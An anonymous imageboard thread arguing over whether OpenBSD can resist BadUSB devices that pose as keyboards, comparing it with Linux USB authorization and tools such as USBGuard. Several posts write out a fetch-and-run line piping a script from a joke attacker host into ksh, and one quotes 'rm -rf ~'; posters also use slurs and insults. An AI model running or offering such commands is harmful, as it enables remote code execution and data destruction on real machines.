Can openBsd become secure?

>attach your usb pendrive
>It registers self as HID
>curl lol.lamao/own.sh | ksh
*Ack*

10 years behind linux

Tip Your Landlord Shirt $21.68

DMT Has Friends For Me Shirt $21.68

Tip Your Landlord Shirt $21.68

  1. 2 months ago
    Anonymous

    Seems it's over.

  2. 2 months ago
    Anonymous

    Raadt sisters, did we got too wienery?

    • 2 months ago
      Anonymous

      Pretty sad they aren't fixing it
      Can IQfy push them into being serious about security? Wasn't that their goal anyway?

      • 2 months ago
        Anonymous

        >failing at the one thing you dedicated your entire operating system to

  3. 2 months ago
    Anonymous

    That fish kinda looks like covid-19

  4. 2 months ago
    Anonymous

    good thing there arent thousands of other mischievious ways to frick up a system when you have physical access to it

    • 2 months ago
      Anonymous

      >User inserting an USB pendrive
      Is identical to
      >Giving someone full access to your hardware and leaving into cuckshed.
      Lol.

      • 2 months ago
        Anonymous

        >Just never attach USB into your openbsd, bro
        >There is NO safe way to do it, no matter how much you try (hint: attach it to Linux instead)

        >attach any HID device
        >it can do the same exact thing on all operating systems
        BSDbros... we lost...

        • 2 months ago
          Anonymous

          No, on Linux you disable USB authorize, then check is the device trying to connect as keyboard or as disk, if it's what you want then you authorize it (if it changes something in middle then it's a new interface with new USB device and new separate authorized=0).

          This tech makes bsds angry and confused

          • 2 months ago
            Anonymous

            And even have programs that.automate that, ev accept new disks and nics but not hid keyboards mouses.

          • 2 months ago
            Anonymous

            you can do that on bsd too
            point is it isn't the default anywhere, and shouldn't be because it is a massive QOL loss for minimal security benefits.

          • 2 months ago
            Anonymous

            >you can do that on bsd too
            Orly?
            Show how - all searching for it returns nothing.

            >Not needed
            How dumb are you? Inserting any pendrive, or DVD USB, nic on USB, camera on USB, can pwn your box (assuming you have or will have open console, which is common esp for bsd, or have a shortcut to open one)

          • 2 months ago
            Anonymous

            It is a common requirement for classified systems.

          • 2 months ago
            Anonymous

            >if an attacker has physical access to your computer it's over
            It's not an attacker (standing alone over your PC, with a screwdriver and soldering iron) you dofus.
            It's you, willingly inserting an USB CD-ROM reader into your pc, and that device suddenly turns out to have hacked firmware and instead is a remote keyboard.

          • 2 months ago
            Anonymous

            I think you replied to the wrong guy. I'd also add that it's also about user error such as plugging in the wrong usb on accident. Just having access to the exterior of a computer is not same as the physical access that the experts mean. I wish they worded things better so idiots like the ones in this thread would stop parroting wrong advice.

      • 2 months ago
        Anonymous

        If I already have physical access to an unlocked computer I can just quickly enter "lol.lamao/own.sh | ksh" myself instead of bothering with some USB device.

        • 2 months ago
          Anonymous

          you have no access
          think of the usb device as maybe some conference swag or chinkshit

        • 2 months ago
          Anonymous

          >If I already have physical access to an unlocked computer I can just quickly enter
          what a moronic homosexual mongrel!
          >letting a stranger walk into your home, pick up your computer, and letting him type commands in terminal
          >is exactly as insecure, unusual and alarming as:
          >plugging an USB dvd reader into your computers
          >it's the same thing!
          fricking L A M A O

          how are people so moronic? is he coping? is he not getting it?

      • 2 months ago
        Anonymous

        >Illustrating the insecurity of *BSD this hard

    • 2 months ago
      Anonymous

      >Just never attach USB into your openbsd, bro
      >There is NO safe way to do it, no matter how much you try (hint: attach it to Linux instead)

  5. 2 months ago
    Anonymous

    cuck license

    • 2 months ago
      Anonymous

      GPL failed. Get used to it.

  6. 2 months ago
    Anonymous

    if thats a problem then just turn off the usb ports

  7. 2 months ago
    Anonymous

    >>curl lol.lamao/own.sh | ksh
    your link is not working

    • 2 months ago
      Anonymous

      Sorry it’s
      www.yougotpw.ned/attack.sh

  8. 2 months ago
    Anonymous

    if an attacker has physical access to your computer it's over anyways
    the mitigation for that isn't at the OS level, it's with a gun

    • 2 months ago
      Anonymous

      Read

      >if an attacker has physical access to your computer it's over
      It's not an attacker (standing alone over your PC, with a screwdriver and soldering iron) you dofus.
      It's you, willingly inserting an USB CD-ROM reader into your pc, and that device suddenly turns out to have hacked firmware and instead is a remote keyboard.

      Noob

      • 2 months ago
        Anonymous

        having access to ports and the keyboard doesn't mean shit
        what's meant by physical access is the access to internal components and the connections between them

        • 2 months ago
          Anonymous

          Yes

  9. 2 months ago
    Anonymous

    >Uhhhh why does my laptop break when I hit the mainboard with an axe
    Only use peripherals you trust, moron. That's security 101

    • 2 months ago
      Anonymous

      You are literally a moronic imbecile.
      Attach USB device that you just bought: Linux - ok; openbsd - get hacked.

      • 2 months ago
        Anonymous

        > OpenBsd can't be used with any connected devices (except the ones you build yourself)
        Useless

        Only buy from vendors you trust. Why do you think every single company bans usb sticks?

        • 2 months ago
          Anonymous

          companies definitely should ban untrusted usb devices
          it's sad that most don't
          even windows can don this btw
          openbsd mogged by microsoft lmao

          • 2 months ago
            Anonymous

            linux and windows have proven to be insecure

        • 2 months ago
          Anonymous

          >Only buy from vendors you trust.
          No such need on Linux.

          linux and windows have proven to be insecure

          >linux and windows have proven to be insecure
          no.
          https://usbguard.github.io/

          The USBGuard software framework helps to protect your computer against rogue USB devices (a.k.a. BadUSB) by implementing basic whitelisting and blacklisting capabilities based on device attributes.

          • 2 months ago
            Anonymous

            yeah linux and windows have proven to be insecure

          • 2 months ago
            Anonymous

            >yeah linux and windows have proven to be insecure
            in what?
            for badUSB, Linux with usbguard is secure, while OpenBSD fails

          • 2 months ago
            Anonymous

            Some OpenBSD user made a simple script that protects you against it ttps://github.com/e-zk/hidlock

          • 2 months ago
            Anonymous

            >just locks your X session when new kb appears
            what an useless hack
            it still lets all usb devices connect so it doesn't really protect against much
            you want to be able to inspect the devices and make policies for which to allow

          • 2 months ago
            Anonymous

            >Some FRICKING moron made a simple script that protects you against it https://github.com/e-zk/hidlock
            it doesn't protect you.

            >OH BRO I WILL SHUT DOWN THE COMPUTER 1 second after you get rootkited in 0.002 seconds, COOL BRO? 1.. or 3 seconds, or N seconds, depending what computer is doing. depend on random timing for your security bro!
            in security-focused distro! lol.

            only solution is to prevent attaching devices (all, not just hid) before they are authorized. Linux figured it out around 10 years ago.

          • 2 months ago
            Anonymous

            USB HID polling is slow as shit, xlock will be faster.

            But nah, let's overengineer everything with a million dbus services and policies written in JavaScript like USBGuard does.

          • 2 months ago
            Anonymous

            >hinge your security on a race condition
            LOL!!!
            brain rot.

            Can someone explain to me what OP is on about?

            >Can someone explain to me what OP is on about?
            https://en.wikipedia.org/wiki/BadUSB

          • 2 months ago
            Anonymous

            >lets remain insecure
            >asking to have /dev/.../authorized is waaaay too much bro
            >better allow your usb camera to become usb keyboard controlled by attacker, that is far safer
            beyond delusional

    • 2 months ago
      Anonymous

      > OpenBsd can't be used with any connected devices (except the ones you build yourself)
      Useless

  10. 2 months ago
    Anonymous

    >on usb detect
    >10 second delay before registration
    >ability to perform attack disappears in 104% of cases
    >convenience cucks will never sacrifice

  11. 2 months ago
    Anonymous

    bsdtroony cope thread

  12. 2 months ago
    Anonymous

    OpenBSD comes with neither curl nor wget preinstalled.

  13. 2 months ago
    Anonymous

    Can someone explain to me what OP is on about?

    • 2 months ago
      Anonymous

      no fricking idea. he just made some shit up and now moronic lintroons are all excited
      the absolute state of this board

    • 2 months ago
      Anonymous

      openBSD has fallen, billions must uninstall

      • 2 months ago
        Anonymous

        >openBSD has fallen
        if any of there compuers would make the mistake of using OpenBSD they would be successfully hacked:
        targeting transportation and insurance companies (since August 2021), and defense companies (since November 2021), with BadUSB attacks designed to deliver REvil or BlackMatter ransomware.[8][9]

        • 2 months ago
          Anonymous
          • 2 months ago
            Anonymous

            It's over.

            In hindsight, had we a chance to motivate OpenBSD (and *BSD) to fix their shit?

  14. 2 months ago
    Anonymous

    Openbsd is more secure than any of your toy distros.

    • 2 months ago
      Anonymous

      >Openbsd is more secure than
      then why it would be hacked in this scenario while linux (with echo 0 > ....default_authorize at boot) would be 100% safe?

      • 2 months ago
        Anonymous

        prove it would be hacked

  15. 2 months ago
    Anonymous

    If somone can touch your computer to plug in a BadUSB they can reboot into the distro. of their choice (which is Kali Linux for sophisticated gentlemen like me) and proceed to do what they want.

    • 2 months ago
      Anonymous

      >If somone can touch your computer to plug in a BadUSB they can reboot into the distro.
      how moronic are you to not understand this?
      it's not "someone" touching your computer, it's YOU plugging in the usb pendrive you got from work.
      (turns out it's not just pendrive).

      prove it would be hacked

      >prove it would be hacked
      it's already a famouse attack in the wild, read above, tard

      >openBSD has fallen
      if any of there compuers would make the mistake of using OpenBSD they would be successfully hacked:
      targeting transportation and insurance companies (since August 2021), and defense companies (since November 2021), with BadUSB attacks designed to deliver REvil or BlackMatter ransomware.[8][9]

      >targeting transportation and insurance companies (since August 2021), and defense companies (since November 2021), with BadUSB attacks designed to deliver REvil or BlackMatter ransomware.[8][9]

      • 2 months ago
        Anonymous

        Why would I plug an untrusted random USB drive into my pc?

        • 2 months ago
          Anonymous

          >Why would I plug an untrusted random USB drive into my pc?
          there is no such thing as "trusted usb".
          maybe if you build one from semiconductors... do you?

          • 2 months ago
            Anonymous

            Did you make your own CPU too?
            How can you trust your USB protection software will work on untrusted silicon?

          • 2 months ago
            Anonymous

            >Did you make your own CPU too?
            yes. next question please?

            >well CPU might be backdoored, better give up on any security anyway
            70 IQ

          • 2 months ago
            Anonymous

            just dont leave a shell logged in as a superuser open, idgi. you're just typing shit into a login prompt on my obsd server if you try this lol. if you can already log in as a user with important access rights you could've just opened a remote shell anyways and saved yourself the trouble, that's true of any system. great security flaw op, very useful.

            vulnsplaining.

            also: openbsd monitoring central: 4 cameras on usb.
            can't never open console on that thing.
            how moronic.

            how about instead just fricking adding AUTHORIZED attribute in /proc like Linux.

  16. 2 months ago
    Anonymous

    >Only two remote holes in the default install, in a heck of a long time!
    note where it says remote moron

  17. 2 months ago
    Anonymous

    the only operating system that is immune to this is one that disallows all USB; or at least has a hwid whitelist. I use badUSBs all the time on everything

  18. 2 months ago
    Anonymous

    [...]

    the only operating system that is immune to this is one that disallows all USB; or at least has a hwid whitelist. I use badUSBs all the time on everything

    https://zakaria.org/posts/2021-01-11-usbkiller.html

  19. 2 months ago
    Anonymous

    [...]

    ://marc.info/?l=openbsd-misc&m=140692695632561
    >deboonked
    >/thread

    the link:
    >2. They have created a rogue keyboard device which will type naughty
    commands. In theory, the same keyboard could type "rm -rf ~" into an
    xterm. This is a tiny bit more challenging since it probably depends
    on your desktop environment and window manager, but presumably your
    attacker will know all that.
    >So yeah, vulnerable.
    lol.
    even your link says you are vulnerable

  20. 2 months ago
    Anonymous

    just dont leave a shell logged in as a superuser open, idgi. you're just typing shit into a login prompt on my obsd server if you try this lol. if you can already log in as a user with important access rights you could've just opened a remote shell anyways and saved yourself the trouble, that's true of any system. great security flaw op, very useful.

  21. 2 months ago
    Anonymous

    this schizo ass homie isn't even writing coherent sentences at this point

    • 2 months ago
      Anonymous

      >I am too dumb to read simple english
      >I will ignore the fact this attack is popular in the wild as linked above twice
      please kys

Leave a Reply to Anonymous Cancel reply

Your email address will not be published. Required fields are marked *